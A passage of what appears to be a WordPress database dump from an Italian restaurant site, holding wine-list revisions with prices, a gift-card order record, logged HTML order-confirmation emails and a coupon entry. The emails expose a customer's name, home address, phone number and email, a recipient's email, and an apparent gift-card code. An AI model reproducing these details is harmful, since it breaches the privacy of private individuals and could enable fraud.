45\r\n\r\nCantina Furlani                      Furlani Brut                                                                                    € 22\r\n\r\nCantina Furlani                      Furlani Brut Nature                                                                      € 22\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>   Veneto</u></strong><u></u>\r\n\r\nCampofalco Biologico             Prosecco Valdobbiadene D.OC.G                                              € 19\r\n\r\nAdami                                         Prosecco Valdob. D.O.C.G. Brut Bosco di Giga                      € 20\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Le mille e una bollicina','','inherit','closed','closed','','75-revision-v1','','','2020-10-24 23:04:03','2020-10-24 21:04:03','',75,'https://www.ristorantesolymar.it/2020/10/24/75-revision-v1/',0,'revision','',0),(1134,2,'2020-10-24 23:08:13','2020-10-24 21:08:13','<p style=\"text-align: center\"><strong>BOLLICINE</strong></p>\r\n<p style=\"text-align: center\"><strong> </strong><strong><u>Italia</u></strong><u></u></p>\r\n<strong><u>     Toscana</u></strong>\r\n\r\nTunia                             Sottofondo I.G.T. Toscana Bianco frizzante                                € 21,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>     Marche</u></strong>\r\n\r\nMarotti Campi               Brut Rosè                                                                                              € 20,00\r\n\r\nLa Staffa                          Mai sentito Igt Marche Frizzante sur le lie                                    € 20,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Campania </u></strong>\r\n\r\nCiro Picariello                Spumante metodo classico Brut Contadino                                   € 27,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Le mille e una bollicina','','inherit','closed','closed','','71-revision-v1','','','2020-10-24 23:08:13','2020-10-24 21:08:13','',71,'https://www.ristorantesolymar.it/2020/10/24/71-revision-v1/',0,'revision','',0),(1135,2,'2020-10-24 23:10:33','2020-10-24 21:10:33','<p style=\"text-align: center\"><strong>Franciacorta</strong></p>\r\n&nbsp;\r\n<p style=\"text-align: left\"><strong>     </strong>Faccoli                            Brut D.O.C.G                                                               € 30,00</p>\r\n<p style=\"text-align: left\">     Majolini<strong>                         </strong>Satèn millesimato D.O.C.G                                      € 30,00</p>\r\n<p style=\"text-align: left\">     Monterossa                     P.R. Brut blanc de blancs                                         € 32,00</p>\r\n<p style=\"text-align: left\">      Cabochon                       Brut millesimo                                                            € 65,00</p>\r\n<p style=\"text-align: left\">      Il Mosnel                        Extra Brut millesimato D.O.C.G                              € 38,00</p>\r\n<p style=\"text-align: left\">                                               Pas dosè D.O.C.G                                                         € 27,00</p>\r\n<p style=\"text-align: left\">       Villa                                Brut rosé millesimato D.O.C.G                                 € 32,00</p>\r\n<p style=\"text-align: left\">                                               Saten millesimato D.O.C.G                                        € 30,00</p>\r\n&nbsp;\r\n<p style=\"text-align: center\"><strong><u>Sud Africa</u></strong></p>\r\n<strong><u> </u></strong>\r\n\r\nPongracz                   Metodo classico brut da chardonnay e pinot nero                     € 28,00\r\n\r\n<strong><u> </u></strong>','Franciacorta','','inherit','closed','closed','','77-revision-v1','','','2020-10-24 23:10:33','2020-10-24 21:10:33','',77,'https://www.ristorantesolymar.it/2020/10/24/77-revision-v1/',0,'revision','',0),(1136,2,'2020-10-24 23:12:58','2020-10-24 21:12:58','<p style=\"text-align: center\"><u>I VINI BIANCHI ITALIANI</u><u></u></p>\r\n<strong><u>   Emilia Romagna</u></strong>\r\n\r\nAncarani                           Famoso Ravenna I.G.T.   ‘18                                                   € 16,00\r\n\r\nTenuta La Palazza          Tornese Chardonnay I.G.T.   ‘18                                            € 20,00\r\n\r\nPoderi del Nespoli          Pagadebit di Romagna D.O.C ‘19                                           € 16,00\r\n\r\nTre Monti                         Sono Chardonnay senza solfiti I.G.P ‘19                               € 19,00\r\n\r\nFattoria Vallona             Ammestesso Pignoletto colli bolognesi D.O.C.                   € 21,00\r\n\r\nSan Patrignano              Aulente I.G.T.   ‘19                                                                       € 16,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Valle d’Aosta</u></strong>\r\n\r\nLes Cretes                        Chardonnay Cuvèe Bois                                                             € 42,00\r\n\r\nPavese Ermes                 Blanc de Morgex et de la Salle D.O.P.                                     € 22,00\r\n\r\n&nbsp;','I vini bianchi italiani','','inherit','closed','closed','','104-revision-v1','','','2020-10-24 23:12:58','2020-10-24 21:12:58','',104,'https://www.ristorantesolymar.it/2020/10/24/104-revision-v1/',0,'revision','',0),(1137,2,'2020-10-24 23:14:32','2020-10-24 21:14:32','<strong><u>   Piemonte</u></strong>\n\nGaja                                Rossj-Bass Chardonnay “18                                                    € 60,00\n\nEttore Germano           Hèrzu Langhe Bianco doc Riesling  “17                                € 24,00\n\nCeretto                           Blangè Arneis D.O.C ’17 .                                                         € 22,00\n\nCoppo                             Monteriolo Chardonnay D.O.C. ‘17                                      € 34,00\n\nAzienda Agricola          Ghiomo   Ghiomo Imprimis ‘17                                                   € 19,00\n\nBellotti Bianco              Semplicemente Vino ‘18                                                             € 18,00\n\nVigneti Massa                Derthona ’17                                                                                   € 24,00\n\n&nbsp;\n\n<strong><u>   Liguria</u></strong>\n\n&nbsp;\n\nStefano Legnani              Bamboo Road bianco non filtrato      ‘16                                   € 20,00\n\n&nbsp;\n\nStefano Legnani             Ponte di Toi bianco non filtrato ‘16                                           € 23,00\n\n&nbsp;\n\nBio Vio                           Pigato di Albenga D.O.C.                                                                       € 23,00\n\n&nbsp;\n\n&nbsp;\n\n&nbsp;\n\n<strong><u>   Lombardia</u></strong>\n\n&nbsp;\n\nCà dei Frati                      Brolettino D.O.C. ‘18                                                                € 19,50\n\n&nbsp;\n\nTenuta Belvedere              Wai I.G.T. ‘17                                                                          € 18,00\n\n&nbsp;\n\n&nbsp;\n\n&nbsp;\n\n&nbsp;\n\n&nbsp;','Piemonte','','inherit','closed','closed','','83-autosave-v1','','','2020-10-24 23:14:32','2020-10-24 21:14:32','',83,'https://www.ristorantesolymar.it/2020/10/24/83-autosave-v1/',0,'revision','',0),(1138,2,'2020-10-24 23:15:43','2020-10-24 21:15:43','<strong><u>   Piemonte</u></strong>\r\n\r\nGaja                                Rossj-Bass Chardonnay “18                                                    € 60,00\r\n\r\nEttore Germano           Hèrzu Langhe Bianco doc Riesling  “17                                € 24,00\r\n\r\nCeretto                           Blangè Arneis D.O.C ’17 .                                                         € 22,00\r\n\r\nCoppo                             Monteriolo Chardonnay D.O.C. ‘17                                       € 34,00\r\n\r\nAzienda Agricola          Ghiomo   Ghiomo Imprimis ‘17                                              € 19,00\r\n\r\nBellotti Bianco              Semplicemente Vino ‘18                                                           € 18,00\r\n\r\nVigneti Massa                Derthona ’17                                                                               € 24,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Liguria</u></strong>\r\n\r\nStefano Legnani              Bamboo Road bianco non filtrato      ‘16                               € 20,00\r\n\r\nStefano Legnani              Ponte di Toi bianco non filtrato ‘16                                        € 23,00\r\n\r\nBio Vio                              Pigato di Albenga D.O.C.                                                           € 23,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Lombardia</u></strong>\r\n\r\nCà dei Frati                      Brolettino D.O.C. ‘18                                                                € 19,50\r\n\r\nTenuta Belvedere           Wai I.G.T. ‘17                                                                             € 18,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Piemonte','','inherit','closed','closed','','83-revision-v1','','','2020-10-24 23:15:43','2020-10-24 21:15:43','',83,'https://www.ristorantesolymar.it/2020/10/24/83-revision-v1/',0,'revision','',0),(1139,2,'2020-10-24 23:20:19','2020-10-24 21:20:19','<strong><u> Trentino Alto Adige</u></strong>\r\n\r\nHartmann Donà              Donà Blanc I.G.T.                                        “11 € 27,0o\r\n\r\nKossler                             Gewurztraminer D.O.C.                              “18 € 20,00\r\n\r\nGirlan                               Gewurztraminer D.O.C.                             “18 € 20,00\r\n\r\nMichele Appiano           Sauvignon St Valentin D.O.C.                   “17 € 32,00\r\n\r\nGewurztraminer St Valentin D.O.C.        “17 € 32,00\r\n\r\nFalkenstein                     Riesling D.O.C.                                                “16 € 24,00\r\n\r\nPinot Bianco D.O.C.                                        “16 € 22,00\r\n\r\nSauvignon D.O.C.                                            “16 € 23,00\r\n\r\nPeter Dipoli                      Voglar Sauvignon D.O.C.          (NO)            “15 € 26,00\r\n\r\nFranz Haas                      Manna Vigneti delle dolomiti I.G.T. (NO) “17 € 26,00\r\n\r\n<strong><u>   Veneto</u></strong>\r\n\r\nInama                               Vulcaia Fumè Sauvignon IGT                     “16 € 36,00\r\n\r\nGiovanni Menti               Riva Arsiglia                                                     “16 € 22,00\r\n\r\nCostadilà Bianco             330 SLM non filtrato Costadilà                      € 21,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Trentino Alto Adige','','inherit','closed','closed','','85-revision-v1','','','2020-10-24 23:20:19','2020-10-24 21:20:19','',85,'https://www.ristorantesolymar.it/2020/10/24/85-revision-v1/',0,'revision','',0),(1141,1,'2020-10-25 21:00:04','2020-10-25 20:00:04','','Order &ndash; Ottobre 25, 2020 @ 09:00 PM','','wc-processing','open','closed','wc_order_0GIIvrxRVihTY','ordine-oct-25-2020-0800-pm','','','2020-10-25 21:01:15','2020-10-25 20:01:15','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=1141',0,'shop_order','',2),(1142,0,'2020-10-25 21:01:17','2020-10-25 20:01:17','\n\n	\n		\n		<title>Sol Y Mar, ristorante a Riccione</title>\n	\n	\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5;margin: 0;padding: 70px 0;width: 100%\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd;border: 1px solid #dcdcdc;border-radius: 3px\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1;color: #ffffff;border-bottom: 0;font-weight: bold;line-height: 100%;vertical-align: middle;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;border-radius: 3px 3px 0 0\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 30px;font-weight: 300;line-height: 150%;margin: 0;text-align: left;color: #ffffff;background-color: inherit\'>Nuova prenotazione cliente</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px\">\n															<div id=\"body_content_inner\" style=\'color: #737373;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 14px;line-height: 150%;text-align: left\'>\n\n<p style=\"margin: 0 0 16px\">Hai ricevuto il seguente ordine da Marcello Manduchi:</p>\n\n<h2 style=\'color: #557da1;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 18px;font-weight: bold;line-height: 130%;margin: 0 0 18px;text-align: left\'>\n	<a class=\"link\" href=\"https://www.ristorantesolymar.it/wp-admin/post.php?post=1141&amp;action=edit\" style=\"font-weight: normal;text-decoration: underline;color: #557da1\">[Ordine #1141]</a> (25 Ottobre 2020)</h2>\n\n<div style=\"margin-bottom: 40px\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;width: 100%;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Prodotto</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Quantità</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Prezzo</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n		Buono Regalo (valore a scelta) (#coupon)<ul class=\"wc-item-meta\" style=\"font-size: small;margin: 1em 0 0;padding: 0\">\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">To Name:</strong> <p style=\"margin: 0\">Filippo Saulle</p>\n</li>\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">To:</strong> <p style=\"margin: 0\"><a href=\"mailto:Filos4@libero.it\" style=\"color: #557da1;font-weight: normal;text-decoration: underline\">Filos4@libero.it</a></p>\n</li>\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">From:</strong> <p style=\"margin: 0\">Amalia e Riccardo Manduchi</p>\n</li>\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">Message:</strong> <p style=\"margin: 0\">Ti doniamo un piccolo momento di piacere, per ringraziarti del tempo e delle cure che ci hai dedicato in questi mesi. Grazie zio!</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n			<span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n	\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left;border-top-width: 4px\">Subtotale:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left;border-top-width: 4px\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Metodo di pagamento:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Totale:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n							</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%;vertical-align: top;margin-bottom: 40px;padding: 0\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;border: 0;padding: 0\">\n			<h2 style=\'color: #557da1;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 18px;font-weight: bold;line-height: 130%;margin: 0 0 18px;text-align: left\'>Indirizzo di fatturazione</h2>\n\n			<address class=\"address\" style=\"padding: 12px;color: #737373;border: 1px solid #e4e4e4\">\n				Marcello Manduchi<br>Torricelli 14<br>47030<br>San Mauro Pascoli<br>FORLÌ-CESENA									<br><a href=\"tel:3204217844\" style=\"color: #557da1;font-weight: normal;text-decoration: underline\">3204217844</a>													<br>marcello.manduchi@hotmail.it							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px\">Congratulazioni per la vendita.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0;border-radius: 6px\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px;border: 0;color: #969696;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 12px;line-height: 150%;text-align: center;padding: 24px 0\'>\n												<p style=\"margin: 0 0 16px\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	\n\n','[Sol Y Mar, ristorante a Riccione] Prenotazione da nuovo cliente (1141) - 25 Ottobre 2020','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-ristorante-a-riccione-prenotazione-da-nuovo-cliente-1141-25-ottobre-2020','','','2020-10-25 21:01:17','2020-10-25 20:01:17','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-prenotazione-da-nuovo-cliente-1141-25-ottobre-2020/',0,'postman_sent_mail','',0),(1143,0,'2020-10-25 21:01:23','2020-10-25 20:01:23','\n\n	\n		\n		<title>Sol Y Mar, ristorante a Riccione</title>\n	\n	\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5;margin: 0;padding: 70px 0;width: 100%\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd;border: 1px solid #dcdcdc;border-radius: 3px\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1;color: #ffffff;border-bottom: 0;font-weight: bold;line-height: 100%;vertical-align: middle;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;border-radius: 3px 3px 0 0\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 30px;font-weight: 300;line-height: 150%;margin: 0;text-align: left;color: #ffffff;background-color: inherit\'>Grazie per il tuo ordine</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px\">\n															<div id=\"body_content_inner\" style=\'color: #737373;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 14px;line-height: 150%;text-align: left\'>\n\n<p style=\"margin: 0 0 16px\">Ciao Marcello,</p>\n<p style=\"margin: 0 0 16px\">Ti informiamo che abbiamo ricevuto il tuo ordine #1141 ed è in fase di elaborazione.</p>\n\n\n<h2 style=\'color: #557da1;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 18px;font-weight: bold;line-height: 130%;margin: 0 0 18px;text-align: left\'>\n	[Ordine #1141] (25 Ottobre 2020)</h2>\n\n<div style=\"margin-bottom: 40px\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;width: 100%;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Prodotto</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Quantità</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Prezzo</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n		Buono Regalo (valore a scelta)<ul class=\"wc-item-meta\" style=\"font-size: small;margin: 1em 0 0;padding: 0\">\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">To Name:</strong> <p style=\"margin: 0\">Filippo Saulle</p>\n</li>\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">To:</strong> <p style=\"margin: 0\"><a href=\"mailto:Filos4@libero.it\" style=\"color: #557da1;font-weight: normal;text-decoration: underline\">Filos4@libero.it</a></p>\n</li>\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">From:</strong> <p style=\"margin: 0\">Amalia e Riccardo Manduchi</p>\n</li>\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">Message:</strong> <p style=\"margin: 0\">Ti doniamo un piccolo momento di piacere, per ringraziarti del tempo e delle cure che ci hai dedicato in questi mesi. Grazie zio!</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n			<span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n			<tr>\n			<td colspan=\"3\" style=\"padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n				<p style=\"margin: 0 0 16px\">Validità 6 mesi dal momento dell\'acquisto</p>\n			</td>\n		</tr>\n		\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left;border-top-width: 4px\">Subtotale:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left;border-top-width: 4px\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Metodo di pagamento:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Totale:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n							</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%;vertical-align: top;margin-bottom: 40px;padding: 0\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;border: 0;padding: 0\">\n			<h2 style=\'color: #557da1;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 18px;font-weight: bold;line-height: 130%;margin: 0 0 18px;text-align: left\'>Indirizzo di fatturazione</h2>\n\n			<address class=\"address\" style=\"padding: 12px;color: #737373;border: 1px solid #e4e4e4\">\n				Marcello Manduchi<br>Torricelli 14<br>47030<br>San Mauro Pascoli<br>FORLÌ-CESENA									<br><a href=\"tel:3204217844\" style=\"color: #557da1;font-weight: normal;text-decoration: underline\">3204217844</a>													<br>marcello.manduchi@hotmail.it							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px\">Grazie per aver usato www.ristorantesolymar.it.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0;border-radius: 6px\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px;border: 0;color: #969696;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 12px;line-height: 150%;text-align: center;padding: 24px 0\'>\n												<p style=\"margin: 0 0 16px\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	\n\n','Il tuo ordine su Sol Y Mar, ristorante a Riccione è stato ricevuto!','Incorrect authentication data\r\n','private','closed','closed','','il-tuo-ordine-su-sol-y-mar-ristorante-a-riccione-e-stato-ricevuto-2','','','2020-10-25 21:01:23','2020-10-25 20:01:23','',0,'https://www.ristorantesolymar.it/postman_sent_mail/il-tuo-ordine-su-sol-y-mar-ristorante-a-riccione-e-stato-ricevuto-2/',0,'postman_sent_mail','',0),(1144,0,'2020-10-25 21:01:23','2020-10-25 20:01:23','GIFTCARD ORDER #1141','solymarcouponB4WIL','GIFTCARD ORDER #1141','publish','closed','closed','','solymarcouponb4wil','','','2020-10-25 21:01:23','2020-10-25 20:01:23','',0,'https://www.ristorantesolymar.it/2020/10/25/solymarcouponb4wil/',0,'shop_coupon','',0),(1145,0,'2020-10-25 21:01:32','2020-10-25 20:01:32','\n\n\n\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"margin: 0 auto;background-color: #ff9898;border-spacing: 10px\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 5px\">\r\n<table class=\"email-container\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff;margin: 0 auto;width: 100%;padding: 10px 0px;border: 2px dashed #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px 0;text-align: left\"><a style=\"font-weight: normal;text-decoration: none;color: #ffffff;margin-left: 10px\"><img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png\" width=\"200px\" height=\"150px\" style=\"border: none;font-size: 14px;font-weight: bold;height: auto;text-decoration: none;text-transform: capitalize;vertical-align: middle;margin-right: 10px;max-width: 100%\"></a></td>\r\n<td style=\"padding: 10px 0;text-align: center\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png\" style=\"border: none;font-size: 14px;font-weight: bold;height: auto;text-decoration: none;text-transform: capitalize;vertical-align: middle;margin-right: 10px;max-width: 100%\"></td>\r\n</tr>\r\n<tr>\r\n<td class=\"img-block\" style=\"text-align: center;padding: 2px 